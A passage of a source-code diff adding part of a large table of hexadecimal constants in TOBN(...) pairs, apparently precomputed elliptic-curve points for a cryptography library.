+     TOBN(0x75622244, 0x03c0eb96), TOBN(0x7632d184, 0x8bf19be6),
+     TOBN(0x05d0f8e9, 0x40735ff4), TOBN(0x3a3e6e13, 0xc00931f1),
+     TOBN(0x31ccde6a, 0xdafe3f18), TOBN(0xf381366a, 0xcfe51207),
+     TOBN(0x24c222a9, 0x60167d92), TOBN(0x62f9d6f8, 0x7529f18c),
+     TOBN(0x412397c0, 0x0353b114), TOBN(0x334d89dc, 0xef808043),
+     TOBN(0xd9ec63ba, 0x2a4383ce), TOBN(0xcec8e937, 0x5cf92ba0),
+     TOBN(0xfb8b4288, 0xc8be74c0), TOBN(0x67d6912f, 0x105d4391),
+     TOBN(0x7b996c46, 0x1b913149), TOBN(0x36aae2ef, 0x3a4e02da),
+     TOBN(0xb68aa003, 0x972de594), TOBN(0x284ec70d, 0x4ec6d545),
+     TOBN(0xf3d2b2d0, 0x61391d54), TOBN(0x69c5d5d6, 0xfe114e92),
+     TOBN(0xbe0f00b5, 0xb4482dff), TOBN(0xe1596fa5, 0xf5bf33c5),
+     TOBN(0x10595b56, 0x96a71cba), TOBN(0x944938b2, 0xfdcadeb7),
+     TOBN(0xa282da4c, 0xfccd8471), TOBN(0x98ec05f3, 0x0d37bfe1),
+     TOBN(0xe171ce1b, 0x0698304a), TOBN(0x2d691444, 0x21bdf79b),
+     TOBN(0xd0cd3b74, 0x1b21dec1), TOBN(0x712ecd8b, 0x16a15f71),
+     TOBN(0x8d4c00a7, 0x00fd56e1), TOBN(0x02ec9692, 0xf9527c18),
+     TOBN(0x21c44937, 0x4a3e42e1), TOBN(0x9176fbab, 0x1392ae0a),
+     TOBN(0x8726f1ba, 0x44b7b618), TOBN(0xb4d7aae9, 0xf1de491c),
+     TOBN(0xf91df7b9, 0x07b582c0), TOBN(0x7e116c30, 0xef60aa3a),
+     TOBN(0x99270f81, 0x466265d7), TOBN(0xb15b6fe2, 0x4df7adf0),
+     TOBN(0xfe33b2d3, 0xf9738f7f), TOBN(0x48553ab9, 0xd6d70f95),
+     TOBN(0x2cc72ac8, 0xc21e94db), TOBN(0x795ac38d, 0xbdc0bbee),
+     TOBN(0x0a1be449, 0x2e40478f), TOBN(0x81bd3394, 0x052bde55),
+     TOBN(0x63c8dbe9, 0x56b3c4f2), TOBN(0x017a99cf, 0x904177cc),
+     TOBN(0x947bbddb, 0x4d010fc1), TOBN(0xacf9b00b, 0xbb2c9b21),
+     TOBN(0x2970bc8d, 0x47173611), TOBN(0x1a4cbe08, 0xac7d756f),
+     TOBN(0x06d9f4aa, 0x67d541a2), TOBN(0xa3e8b689, 0x59c2cf44),
+     TOBN(0xaad066da, 0x4d88f1dd), TOBN(0xc604f165, 0x7ad35dea),
+     TOBN(0x7edc0720, 0x4478ca67), TOBN(0xa10dfae0, 0xba02ce06),
+     TOBN(0xeceb1c76, 0xaf36f4e4), TOBN(0x994b2292, 0xaf3f8f48),
+     TOBN(0xbf9ed77b, 0x77c8a68c), TOBN(0x74f544ea, 0x51744c9d),
+     TOBN(0x82d05bb9, 0x8113a757), TOBN(0x4ef2d2b4, 0x8a9885e4),
+     TOBN(0x1e332be5, 0x1aa7865f), TOBN(0x22b76b18, 0x290d1a52),
+     TOBN(0x308a2310, 0x44351683), TOBN(0x9d861896, 0xa3f22840),
+     TOBN(0x5959ddcd, 0x841ed947), TOBN(0x0def0c94, 0x154b73bf),
+     TOBN(0xf0105417, 0x4c7c15e0), TOBN(0x539bfb02, 0x3a277c32),
+     TOBN(0xe699268e, 0xf9dccf5f), TOBN(0x9f5796a5, 0x0247a3bd),
+     TOBN(0x8b839de8, 0x4f157269), TOBN(0xc825c1e5, 0x7a30196b),
+     TOBN(0x6ef0aabc, 0xdc8a5a91), TOBN(0xf4a8ce6c, 0x498b7fe6),
+     TOBN(0x1cce35a7, 0x70cbac78), TOBN(0x83488e9b, 0xf6b23958),
+     TOBN(0x0341a070, 0xd76cb011), TOBN(0xda6c9d06, 0xae1b2658),
+     TOBN(0xb701fb30, 0xdd648c52), TOBN(0x994ca02c, 0x52fb9fd1),
+     TOBN(0x06933117, 0x6f563086), TOBN(0x3d2b8100, 0x17856bab),
+     TOBN(0xe89f48c8, 0x5963a46e), TOBN(0x658ab875, 0xa99e61c7),
+     TOBN(0x6e296f87, 0x4b8517b4), TOBN(0x36c4fcdc, 0xfc1bc656),
+     TOBN(0xde5227a1, 0xa3906def), TOBN(0x9fe95f57, 0x62418945),
+     TOBN(0x20c91e81, 0xfdd96cde), TOBN(0x5adbe47e, 0xda4480de),
+     TOBN(0xa009370f, 0x396de2b6), TOBN(0x98583d4b, 0xf0ecc7bd),
+     TOBN(0xf44f6b57, 0xe51d0672), TOBN(0x03d6b078, 0x556b1984),
+     TOBN(0x27dbdd93, 0xb0b64912), TOBN(0x9b3a3434, 0x15687b09),
+     TOBN(0x0dba6461, 0x51ec20a9), TOBN(0xec93db7f, 0xff28187c),
+     TOBN(0x00ff8c24, 0x66e48bdd), TOBN(0x2514f2f9, 0x11ccd78e),
+     TOBN(0xeba11f4f, 0xe1250603), TOBN(0x8a22cd41, 0x243fa156),
+     TOBN(0xa4e58df4, 0xb283e4c6), TOBN(0x78c29859, 0x8b39783f),
+     TOBN(0x5235aee2, 0xa5259809), TOBN(0xc16284b5, 0x0e0227dd),
+     TOBN(0xa5f57916, 0x1338830d), TOBN(0x6d4b8a6b, 0xd2123fca),
+     TOBN(0x236ea68a, 0xf9c546f8), TOBN(0xc1d36873, 0xfa608d36),
+     TOBN(0xcd76e495, 0x8d436d13), TOBN(0xd4d9c221, 0x8fb080af),
+     TOBN(0x665c1728, 0xe8ad3fb5), TOBN(0xcf1ebe4d, 0xb3d572e0),
+     TOBN(0xa7a8746a, 0x584c5e20), TOBN(0x267e4ea1, 0xb9dc7035),
+     TOBN(0x593a15cf, 0xb9548c9b), TOBN(0x5e6e2135, 0x4bd012f3),
+     TOBN(0xdf31cc6a, 0x8c8f936e), TOBN(0x8af84d04, 0xb5c241dc),
+     TOBN(0x63990a6f, 0x345efb86), TOBN(0x6fef4e61, 0xb9b962cb)}
+    ,
+    {TOBN(0xf6368f09, 0x25722608), TOBN(0x131260db, 0x131cf5c6),
+     TOBN(0x40eb353b, 0xfab4f7ac), TOBN(0x85c78880, 0x37eee829),
+     TOBN(0x4c1581ff, 0xc3bdf24e), TOBN(0x5bff75cb, 0xf5c3c5a8),
+     TOBN(0x35e8c83f, 0xa14e6f40), TOBN(0xb81d1c0f, 0x0295e0ca),
+     TOBN(0xfcde7cc8, 0xf43a730f), TOBN(0xe89b6f3c, 0x33ab590e),
+     TOBN(0xc823f529, 0xad03240b), TOBN(0x82b79afe, 0x98bea5db),
+     TOBN(0x568f2856, 0x962fe5de), TOBN(0x0c590adb, 0x60c591f3),
+     TOBN(0x1fc74a14, 0x4a28a858), TOBN(0x3b662498, 0xb3203f4c),
+     TOBN(0x91e3cf0d, 0x6c39765a), TOBN(0xa2db3acd, 0xac3cca0b),
+     TOBN(0x288f2f08, 0xcb953b50), TOBN(0x2414582c, 0xcf43cf1a),
+     TOBN(0x8dec8bbc, 0x60eee9a8), TOBN(0x54c79f02, 0x729aa042),
+     TOBN(0xd81cd5ec, 0x6532f5d5), TOBN(0xa672303a, 0xcf82e15f),
+     TOBN(0x376aafa8, 0x719c0563), TOBN(0xcd8ad2dc, 0xbc5fc79f),
+     TOBN(0x303fdb9f, 0xcb750cd3), TOBN(0x14ff052f, 0x4418b08e),
+     TOBN(0xf75084cf, 0x3e2d6520), TOBN(0x7ebdf0f8, 0x144ed509),
+     TOBN(0xf43bf0f2, 0xd3f25b98), TOBN(0x86ad71cf, 0xa354d837),
+     TOBN(0xb827fe92, 0x26f43572), TOBN(0xdfd3ab5b, 0x5d824758),
+     TOBN(0x315dd23a, 0x539094c1), TOBN(0x85c0e37a, 0x66623d68),
+     TOBN(0x575c7972, 0x7be19ae0), TOBN(0x616a3396, 0xdf0d36b5),
+     TOBN(0xa1ebb3c8, 0x26b1ff7e), TOBN(0x635b9485, 0x140ad453),
+     TOBN(0x92bf3cda, 0xda430c0b), TOBN(0x4702850e, 0x3a96dac6),
+     TOBN(0xc91cf0a5, 0x15ac326a), TOBN(0x95de4f49, 0xab8c25e4),
+     TOBN(0xb01bad09, 0xe265c17c), TOBN(0x24e45464, 0x087b3881),
+     TOBN(0xd43e583c, 0xe1fac5ca), TOBN(0xe17cb318, 0x6ead97a6),
+     TOBN(0x6cc39243, 0x74dcec46), TOBN(0x33cfc02d, 0x54c2b73f),
+     TOBN(0x82917844, 0xf26cd99c), TOBN(0x8819dd95, 0xd1773f89),
+     TOBN(0x09572aa6, 0x0871f427), TOBN(0x8e0cf365, 0xf6f01c34),
+     TOBN(0x7fa52988, 0xbff1f5af), TOBN(0x4eb357ea, 0xe75e8e50),
+     TOBN(0xd9d0c8c4, 0x868af75d), TOBN(0xd7325cff, 0x45c8c7ea),
+     TOBN(0xab471996, 0xcc81ecb0), TOBN(0xff5d55f3, 0x611824ed),
+     TOBN(0xbe314541, 0x1977a0ee), TOBN(0x5085c4c5, 0x722038c6),
+     TOBN(0x2d5335bf, 0xf94bb495), TOBN(0x894ad8a6, 0xc8e2a082),
+     TOBN(0x5c3e2341, 0xada35438), TOBN(0xf4a9fc89, 0x049b8c4e),
+     TOBN(0xbeeb355a, 0x9f17cf34), TOBN(0x3f311e0e, 0x6c91fe10),
+     TOBN(0xc2d20038, 0x92ab9891), TOBN(0x257bdcc1, 0x3e8ce9a9),
+     TOBN(0x1b2d9789, 0x88c53bee), TOBN(0x927ce89a, 0xcdba143a),
+     TOBN(0xb0a32cca, 0x523db280), TOBN(0x5c889f8a, 0x50d43783),
+     TOBN(0x503e04b3, 0x4897d16f), TOBN(0x8cdb6e78, 0x08f5f2e8),
+     TOBN(0x6ab91cf0, 0x179c8e74), TOBN(0xd8874e52, 0x48211d60),
+     TOBN(0xf948d4d5, 0xea851200), TOBN(0x4076d41e, 0xe6f9840a),
+     TOBN(0xc20e263c, 0x47b517ea), TOBN(0x79a448fd, 0x30685e5e),
+     TOBN(0xe55f6f78, 0xf90631a0), TOBN(0x88a790b1, 0xa79e6346),
+     TOBN(0x62160c7d, 0x80969fe8), TOBN(0x54f92fd4, 0x41491bb9),
+     TOBN(0xa6645c23, 0x5c957526), TOBN(0xf44cc5ae, 0xbea3ce7b),
+     TOBN(0xf7628327, 0x8b1e68b7), TOBN(0xc731ad7a, 0x303f29d3),
+     TOBN(0xfe5a9ca9, 0x57d03ecb), TOBN(0x96c0d50c, 0x41bc97a7),
+     TOBN(0xc4669fe7, 0x9b4f7f24), TOBN(0xfdd781d8, 0x3d9967ef),
+     TOBN(0x7892c7c3, 0x5d2c208d), TOBN(0x8bf64f7c, 0xae545cb3),
+     TOBN(0xc01f862c, 0x467be912), TOBN(0xf4c85ee9, 0xc73d30cc),
+     TOBN(0x1fa6f4be, 0x6ab83ec7), TOBN(0xa07a3c1c, 0x4e3e3cf9),
+     TOBN(0x87f8ef45, 0x0c00beb3), TOBN(0x30e2c2b3, 0x000d4c3e),
+     TOBN(0x1aa00b94, 0xfe08bf5b), TOBN(0x32c133aa, 0x9224ef52),
+     TOBN(0x38df16bb, 0x32e5685d), TOBN(0x68a9e069, 0x58e6f544),
+     TOBN(0x495aaff7, 0xcdc5ebc6), TOBN(0xf894a645, 0x378b135f),
+     TOBN(0xf316350a, 0x09e27ecf), TOBN(0xeced201e, 0x58f7179d),
+     TOBN(0x2eec273c, 0xe97861ba), TOBN(0x47ec2cae, 0xd693be2e),
+     TOBN(0xfa4c97c4, 0xf68367ce), TOBN(0xe4f47d0b, 0xbe5a5755),
+     TOBN(0x17de815d, 0xb298a979), TOBN(0xd7eca659, 0xc177dc7d),
+     TOBN(0x20fdbb71, 0x49ded0a3), TOBN(0x4cb2aad4, 0xfb34d3c5),
+     TOBN(0x2cf31d28, 0x60858a33), TOBN(0x3b6873ef, 0xa24aa40f),
+     TOBN(0x540234b2, 0x2c11bb37), TOBN(0x2d0366dd, 0xed4c74a3),
+     TOBN(0xf9a968da, 0xeec5f25d), TOBN(0x36601068, 0x67b63142),
+     TOBN(0x07cd6d2c, 0x68d7b6d4), TOBN(0xa8f74f09, 0x0c842942),
+     TOBN(0xe2751404, 0x7768b1ee), TOBN(0x4b5f7e89, 0xfe62aee4),
+     TOBN(0xc6a77177, 0x89070d26), TOBN(0xa1f28e4e, 0xdd1c8bc7),
+     TOBN(0xea5f4f06, 0x469e1f17), TOBN(0x78fc242a, 0xfbdb78e0),
+     TOBN(0xc9c7c592, 0x8b0588f1), TOBN(0xb6b7a0fd, 0x1535921e),
+     TOBN(0xcc5bdb91, 0xbde5ae35), TOBN(0xb42c485e, 0x12ff1864),
+     TOBN(0xa1113e13, 0xdbab98aa), TOBN(0xde9d469b, 0xa17b1024),
+     TOBN(0x23f48b37, 0xc0462d3a), TOBN(0x3752e537, 0x7c5c078d),
+     TOBN(0xe3a86add, 0x15544eb9), TOBN(0xf013aea7, 0x80fba279),
+     TOBN(0x8b5bb76c, 0xf22001b5), TOBN(0xe617ba14, 0xf02891ab),
+     TOBN(0xd39182a6, 0x936219d3), TOBN(0x5ce1f194, 0xae51cb19),
+     TOBN(0xc78f8598, 0xbf07a74c), TOBN(0x6d7158f2, 0x22cbf1bc),
+     TOBN(0x3b846b21, 0xe300ce18), TOBN(0x35fba630, 0x2d11275d),
+     TOBN(0x5fe25c36, 0xa0239b9b), TOBN(0xd8beb35d, 0xdf05d940),
+     TOBN(0x4db02bb0, 0x1f7e320d), TOBN(0x0641c364, 0x6da320ea),
+     TOBN(0x6d95fa5d, 0x821389a3), TOBN(0x92699748, 0x8fcd8e3d),
+     TOBN(0x316fef17, 0xceb6c143), TOBN(0x67fcb841, 0xd933762b),
+     TOBN(0xbb837e35, 0x118b17f8), TOBN(0x4b92552f, 0x9fd24821),
+     TOBN(0xae6bc70e, 0x46aca793), TOBN(0x1cf0b0e4, 0xe579311b),
+     TOBN(0x8dc631be, 0x5802f716), TOBN(0x099bdc6f, 0xbddbee4d),
+     TOBN(0xcc352bb2, 0x0caf8b05), TOBN(0xf74d505a, 0x72d63df2),
+     TOBN(0xb9876d4b, 0x91c4f408), TOBN(0x1ce18473, 0x9e229b2d),
+     TOBN(0x49507597, 0x83abdb4a), TOBN(0x850fbcb6, 0xdee84b18),
+     TOBN(0x6325236e, 0x609e67dc), TOBN(0x04d831d9, 0x9336c6d8),
+     TOBN(0x8deaae3b, 0xfa12d45d), TOBN(0xe425f8ce, 0x4746e246),
+     TOBN(0x8004c175, 0x24f5f31e), TOBN(0xaca16d8f, 0xad62c3b7),
+     TOBN(0x0dc15a6a, 0x9152f934), TOBN(0xf1235e5d, 0xed0e12c1),
+     TOBN(0xc33c06ec, 0xda477dac), TOBN(0x76be8732, 0xb2ea0006),
+     TOBN(0xcf3f7831, 0x0c0cd313), TOBN(0x3c524553, 0xa614260d),
+     TOBN(0x31a756f8, 0xcab22d15), TOBN(0x03ee10d1, 0x77827a20),
+     TOBN(0xd1e059b2, 0x1994ef20), TOBN(0x2a653b69, 0x638ae318),
+     TOBN(0x70d5eb58, 0x2f699010), TOBN(0x279739f7, 0x09f5f84a),
+     TOBN(0x5da4663c, 0x8b799336), TOBN(0xfdfdf14d, 0x203c37eb),
+     TOBN(0x32d8a9dc, 0xa1dbfb2d), TOBN(0xab40cff0, 0x77d48f9b),
+     TOBN(0xc018b383, 0xd20b42d5), TOBN(0xf9a810ef, 0x9f78845f),
+     TOBN(0x40af3753, 0xbdba9df0), TOBN(0xb90bdcfc, 0x131dfdf9),
+     TOBN(0x18720591, 0xf01ab782), TOBN(0xc823f211, 0x6af12a88),
+     TOBN(0xa51b80f3, 0x0dc14401), TOBN(0xde248f77, 0xfb2dfbe3),
+     TOBN(0xef5a44e5, 0x0cafe751), TOBN(0x73997c9c, 0xd4dcd221),
+     TOBN(0x32fd86d1, 0xde854024), TOBN(0xd5b53adc, 0xa09b84bb),
+     TOBN(0x008d7a11, 0xdcedd8d1), TOBN(0x406bd1c8, 0x74b32c84),
+     TOBN(0x5d4472ff, 0x05dde8b1), TOBN(0x2e25f2cd, 0xfce2b32f),
+     TOBN(0xbec0dd5e, 0x29dfc254), TOBN(0x4455fcf6, 0x2b98b267),
+     TOBN(0x0b4d43a5, 0xc72df2ad), TOBN(0xea70e6be, 0x48a75397),
+     TOBN(0x2aad6169, 0x5820f3bf), TOBN(0xf410d2dd, 0x9e37f68f),
+     TOBN(0x70fb7dba, 0x7be5ac83), TOBN(0x636bb645, 0x36ec3eec),
+     TOBN(0x27104ea3, 0x9754e21c), TOBN(0xbc87a3e6, 0x8d63c373),
+     TOBN(0x483351d7, 0x4109db9a), TOBN(0x0fa724e3, 0x60134da7),
+     TOBN(0x9ff44c29, 0xb0720b16), TOBN(0x2dd0cf13, 0x06aceead),
+     TOBN(0x5942758c, 0xe26929a6), TOBN(0x96c5db92, 0xb766a92b),
+     TOBN(0xcec7d4c0, 0x5f18395e), TOBN(0xd3f22744, 0x1f80d032),
+     TOBN(0x7a68b37a, 0xcb86075b), TOBN(0x074764dd, 0xafef92db),
+     TOBN(0xded1e950, 0x7bc7f389), TOBN(0xc580c850, 0xb9756460),
+     TOBN(0xaeeec2a4, 0x7da48157), TOBN(0x3f0b4e7f, 0x82c587b3),
+     TOBN(0x231c6de8, 0xa9f19c53), TOBN(0x5717bd73, 0x6974e34e),
+     TOBN(0xd9e1d216, 0xf1508fa9), TOBN(0x9f112361, 0xdadaa124),
+     TOBN(0x80145e31, 0x823b7348), TOBN(0x4dd8f0d5, 0xac634069),
+     TOBN(0xe3d82fc7, 0x2297c258), TOBN(0x276fcfee, 0x9cee7431),
+     TOBN(0x8eb61b5e, 0x2bc0aea9), TOBN(0x4f668fd5, 0xde329431),
+     TOBN(0x03a32ab1, 0x38e4b87e), TOBN(0xe1374517, 0x73d0ef0b),
+     TOBN(0x1a46f7e6, 0x853ac983), TOBN(0xc3bdf42e, 0x68e78a57),
+     TOBN(0xacf20785, 0x2ea96dd1), TOBN(0xa10649b9, 0xf1638460),
+     TOBN(0xf2369f0b, 0x879fbbed), TOBN(0x0ff0ae86, 0xda9d1869),
+     TOBN(0x5251d759, 0x56766f45), TOBN(0x4984d8c0, 0x2be8d0fc),
+     TOBN(0x7ecc95a6, 0xd21008f0), TOBN(0x29bd54a0, 0x3a1a1c49),
+     TOBN(0xab9828c5, 0xd26c50f3), TOBN(0x32c0087c, 0x51d0d251),
+     TOBN(0x9bac3ce6, 0x0c1cdb26), TOBN(0xcd94d947, 0x557ca205),
+     TOBN(0x1b1bd598, 0x9db1fdcd), TOBN(0x0eda0108, 0xa3d8b149),
+     TOBN(0x95066610, 0x56152fcc), TOBN(0xc2f037e6, 0xe7192b33),
+     TOBN(0xdeffb41a, 0xc92e05a4), TOBN(0x1105f6c2, 0xc2f6c62e),
+     TOBN(0x68e73500, 0x8733913c), TOBN(0xcce86163, 0x3f3adc40),
+     TOBN(0xf407a942, 0x38a278e9), TOBN(0xd13c1b9d, 0x2ab21292),
+     TOBN(0x93ed7ec7, 0x1c74cf5c), TOBN(0x8887dc48, 0xf1a4c1b4),
+     TOBN(0x3830ff30, 0x4b3a11f1), TOBN(0x358c5a3c, 0x58937cb6),
+     TOBN(0x027dc404, 0x89022829), TOBN(0x40e93977, 0x3b798f79),
+     TOBN(0x90ad3337, 0x38be6ead), TOBN(0x9c23f6bc, 0xf34c0a5d),
+     TOBN(0xd1711a35, 0xfbffd8bb), TOBN(0x60fcfb49, 0x1949d3dd),
+     TOBN(0x09c8ef4b, 0x7825d93a), TOBN(0x24233cff, 0xa0a8c968),
+     TOBN(0x67ade46c, 0xe6d982af), TOBN(0xebb6bf3e, 0xe7544d7c),
+     TOBN(0xd6b9ba76, 0x3d8bd087), TOBN(0x46fe382d, 0x4dc61280),
+     TOBN(0xbd39a7e8, 0xb5bdbd75), TOBN(0xab381331, 0xb8f228fe),
+     TOBN(0x0709a77c, 0xce1c4300), TOBN(0x6a247e56, 0xf337ceac),
+     TOBN(0x8f34f21b, 0x636288be), TOBN(0x9dfdca74, 0xc8a7c305),
+     TOBN(0x6decfd1b, 0xea919e04), TOBN(0xcdf2688d, 0x8e1991f8),
+     TOBN(0xe607df44, 0xd0f8a67e), TOBN(0xd985df4b, 0x0b58d010),
+     TOBN(0x57f834c5, 0x0c24f8f4), TOBN(0xe976ef56, 0xa0bf01ae),
+     TOBN(0x536395ac, 0xa1c32373), TOBN(0x351027aa, 0x734c0a13),
+     TOBN(0xd2f1b5d6, 0x5e6bd5bc), TOBN(0x2b539e24, 0x223debed),
+     TOBN(0xd4994cec, 0x0eaa1d71), TOBN(0x2a83381d, 0x661dcf65),
+     TOBN(0x5f1aed2f, 0x7b54c740), TOBN(0x0bea3fa5, 0xd6dda5ee),
+     TOBN(0x9d4fb684, 0x36cc6134), TOBN(0x8eb9bbf3, 0xc0a443dd),
+     TOBN(0xfc500e2e, 0x383b7d2a), TOBN(0x7aad621c, 0x5b775257),
+     TOBN(0x69284d74, 0x0a8f7cc0), TOBN(0xe820c2ce, 0x07562d65),
+     TOBN(0xbf9531b9, 0x499758ee), TOBN(0x73e95ca5, 0x6ee0cc2d),
+     TOBN(0xf61790ab, 0xfbaf50a5), TOBN(0xdf55e76b, 0x684e0750),
+     TOBN(0xec516da7, 0xf176b005), TOBN(0x575553bb, 0x7a2dddc7),
+     TOBN(0x37c87ca3, 0x553afa73), TOBN(0x315f3ffc, 0x4d55c251),
+     TOBN(0xe846442a, 0xaf3e5d35), TOBN(0x61b91149, 0x6495ff28),
+     TOBN(0x23cc95d3, 0xfa326dc3), TOBN(0x1df4da1f, 0x18fc2cea),
+     TOBN(0x24bf9adc, 0xd0a37d59), TOBN(0xb6710053, 0x320d6e1e),
+     TOBN(0x96f9667e, 0x618344d1), TOBN(0xcc7ce042, 0xa06445af),
+     TOBN(0xa02d8514, 0xd68dbc3a), TOBN(0x4ea109e4, 0x280b5a5b),
+     TOBN(0x5741a7ac, 0xb40961bf), TOBN(0x4ada5937, 0x6aa56bfa),
+     TOBN(0x7feb9145, 0x02b765d1), TOBN(0x561e97be, 0xe6ad1582),
+     TOBN(0xbbc4a5b6, 0xda3982f5), TOBN(0x0c2659ed, 0xb546f468),
+     TOBN(0xb8e7e6aa, 0x59612d20), TOBN(0xd83dfe20, 0xac19e8e0),
+     TOBN(0x8530c45f, 0xb835398c), TOBN(0x6106a8bf, 0xb38a41c2),
+     TOBN(0x21e8f9a6, 0x35f5dcdb), TOBN(0x39707137, 0xcae498ed),
+     TOBN(0x70c23834, 0xd8249f00), TOBN(0x9f14b58f, 0xab2537a0),
+     TOBN(0xd043c365, 0x5f61c0c2), TOBN(0xdc5926d6, 0x09a194a7),
+     TOBN(0xddec0339, 0x8e77738a), TOBN(0xd07a63ef, 0xfba46426),
+     TOBN(0x2e58e79c, 0xee7f6e86), TOBN(0xe59b0459, 0xff32d241),
+     TOBN(0xc5ec84e5, 0x20fa0338), TOBN(0x97939ac8, 0xeaff5ace),
+     TOBN(0x0310a4e3, 0xb4a38313), TOBN(0x9115fba2, 0x8f9d9885),
+     TOBN(0x8dd710c2, 0x5fadf8c3), TOBN(0x66be38a2, 0xce19c0e2),
+     TOBN(0xd42a279c, 0x4cfe5022), TOBN(0x597bb530, 0x0e24e1b8),
+     TOBN(0x3cde86b7, 0xc153ca7f), TOBN(0xa8d30fb3, 0x707d63bd),
+     TOBN(0xac905f92, 0xbd60d21e), TOBN(0x98e7ffb6, 0x7b9a54ab),
+     TOBN(0xd7147df8, 0xe9726a30), TOBN(0xb5e216ff, 0xafce3533),
+     TOBN(0xb550b799, 0x2ff1ec40), TOBN(0x6b613b87, 0xa1e953fd),
+     TOBN(0x87b88dba, 0x792d5610), TOBN(0x2ee1270a, 0xa190fbe1),
+     TOBN(0x02f4e2dc, 0x2ef581da), TOBN(0x016530e4, 0xeff82a95),
+     TOBN(0xcbb93dfd, 0x8fd6ee89), TOBN(0x16d3d986, 0x46848fff),
+     TOBN(0x600eff24, 0x1da47adf), TOBN(0x1b9754a0, 0x0ad47a71),
+     TOBN(0x8f9266df, 0x70c33b98), TOBN(0xaadc87ae, 0xdf34186e),
+     TOBN(0x0d2ce8e1, 0x4ad24132), TOBN(0x8a47cbfc, 0x19946eba),
+     TOBN(0x47feeb66, 0x62b5f3af), TOBN(0xcefab561, 0x0abb3734),
+     TOBN(0x449de60e, 0x19f35cb1), TOBN(0x39f8db14, 0x157f0eb9),
+     TOBN(0xffaecc5b, 0x3c61bfd6), TOBN(0xa5a4d41d, 0x41216703),
+     TOBN(0x7f8fabed, 0x224e1cc2), TOBN(0x0d5a8186, 0x871ad953),
+     TOBN(0xf10774f7, 0xd22da9a9), TOBN(0x45b8a678, 0xcc8a9b0d),
+     TOBN(0xd9c2e722, 0xbdc32cff), TOBN(0xbf71b5f5, 0x337202a5),
+     TOBN(0x95c57f2f, 0x69fc4db9), TOBN(0xb6dad34c, 0x765d01e1),
+     TOBN(0x7e0bd13f, 0xcb904635), TOBN(0x61751253, 0x763a588c),
+     TOBN(0xd85c2997, 0x81af2c2d), TOBN(0xc0f7d9c4, 0x81b9d7da),
+     TOBN(0x838a34ae, 0x08533e8d), TOBN(0x15c4cb08, 0x311d8311),
+     TOBN(0x97f83285, 0x8e121e14), TOBN(0xeea7dc1e, 0x85000a5f),
+     TOBN(0x0c6059b6, 0x5d256274), TOBN(0xec9beace, 0xb95075c0),
+     TOBN(0x173daad7, 0x1df97828), TOBN(0xbf851cb5, 0xa8937877),
+     TOBN(0xb083c594, 0x01646f3c), TOBN(0x3bad30cf, 0x50c6d352),
+     TOBN(0xfeb2b202, 0x496bbcea), TOBN(0x3cf9fd4f, 0x18a1e8ba),
+     TOBN(0xd26de7ff, 0x1c066029), TOBN(0x39c81e9e, 0x4e9ed4f8),
+     TOBN(0xd8be0cb9, 0x7b390d35), TOBN(0x01df2bbd, 0x964aab27),
+     TOBN(0x3e8c1a65, 0xc3ef64f8), TOBN(0x567291d1, 0x716ed1dd),
+     TOBN(0x95499c6c, 0x5f5406d3), TOBN(0x71fdda39, 0x5ba8e23f),
+     TOBN(0xcfeb320e, 0xd5096ece), TOBN(0xbe7ba92b, 0xca66dd16),
+     TOBN(0x4608d36b, 0xc6fb5a7d), TOBN(0xe3eea15a, 0x6d2dd0e0),
+     TOBN(0x75b0a3eb, 0x8f97a36a), TOBN(0xf59814cc, 0x1c83de1e),
+     TOBN(0x56c9c5b0, 0x1c33c23f), TOBN(0xa96c1da4, 0x6faa4136),
+     TOBN(0x46bf2074, 0xde316551), TOBN(0x3b866e7b, 0x1f756c8f),
+     TOBN(0x727727d8, 0x1495ed6b), TOBN(0xb2394243, 0xb682dce7),
+     TOBN(0x8ab8454e, 0x758610f3), TOBN(0xc243ce84, 0x857d72a4),
+     TOBN(0x7b320d71, 0xdbbf370f), TOBN(0xff9afa37, 0x78e0f7ca),
+     TOBN(0x0119d1e0, 0xea7b523f), TOBN(0xb997f8cb, 0x058c7d42),
+     TOBN(0x285bcd2a, 0x37bbb184), TOBN(0x51dcec49, 0xa45d1fa6),
+     TOBN(0x6ade3b64, 0xe29634cb), TOBN(0x080c94a7, 0x26b86ef1),
+     TOBN(0xba583db1, 0x2283fbe3), TOBN(0x902bddc8, 0x5a9315ed),
+     TOBN(0x07c1ccb3, 0x86964bec), TOBN(0x78f4eacf, 0xb6258301),
+     TOBN(0x4bdf3a49, 0x56f90823), TOBN(0xba0f5080, 0x741d777b),
+     TOBN(0x091d71c3, 0xf38bf760), TOBN(0x9633d50f, 0x9b625b02),
+     TOBN(0x03ecb743, 0xb8c9de61), TOBN(0xb4751254, 0x5de74720),
+     TOBN(0x9f9defc9, 0x74ce1cb2), TOBN(0x774a4f6a, 0x00bd32ef),
+     TOBN(0xaca385f7, 0x73848f22), TOBN(0x53dad716, 0xf3f8558e),
+     TOBN(0xab7b34b0, 0x93c471f9), TOBN(0xf530e069, 0x19644bc7),
+     TOBN(0x3d9fb1ff, 0xdd59d31a), TOBN(0x4382e0df, 0x08daa795),
+     TOBN(0x165c6f4b, 0xd5cc88d7), TOBN(0xeaa392d5, 0x4a18c900),
+     TOBN(0x94203c67, 0x648024ee), TOBN(0x188763f2, 0x8c2fabcd),
+     TOBN(0xa80f87ac, 0xbbaec835), TOBN(0x632c96e0, 0xf29d8d54),
+     TOBN(0x29b0a60e, 0x4c00a95e), TOBN(0x2ef17f40, 0xe011e9fa),
+     TOBN(0xf6c0e1d1, 0x15b77223), TOBN(0xaaec2c62, 0x14b04e32),
+     TOBN(0xd35688d8, 0x3d84e58c), TOBN(0x2af5094c, 0x958571db),
+     TOBN(0x4fff7e19, 0x760682a6), TOBN(0x4cb27077, 0xe39a407c),
+     TOBN(0x0f59c547, 0x4ff0e321), TOBN(0x169f34a6, 0x1b34c8ff),
+     TOBN(0x2bff1096, 0x52bc1ba7), TOBN(0xa25423b7, 0x83583544),
+     TOBN(0x5d55d5d5, 0x0ac8b782), TOBN(0xff6622ec, 0x2db3c892),
+     TOBN(0x48fce741, 0x6b8bb642), TOBN(0x31d6998c, 0x69d7e3dc),
+     TOBN(0xdbaf8004, 0xcadcaed0), TOBN(0x801b0142, 0xd81d053c),
+     TOBN(0x94b189fc, 0x59630ec6), TOBN(0x120e9934, 0xaf762c8e),
+     TOBN(0x53a29aa4, 0xfdc6a404), TOBN(0x19d8e01e, 0xa1909948),
+     TOBN(0x3cfcabf1, 0xd7e89681), TOBN(0x3321a50d, 0x4e132d37),
+     TOBN(0xd0496863, 0xe9a86111), TOBN(0x8c0cde61, 0x06a3bc65),
+     TOBN(0xaf866c49, 0xfc9f8eef), TOBN(0x2066350e, 0xff7f5141),
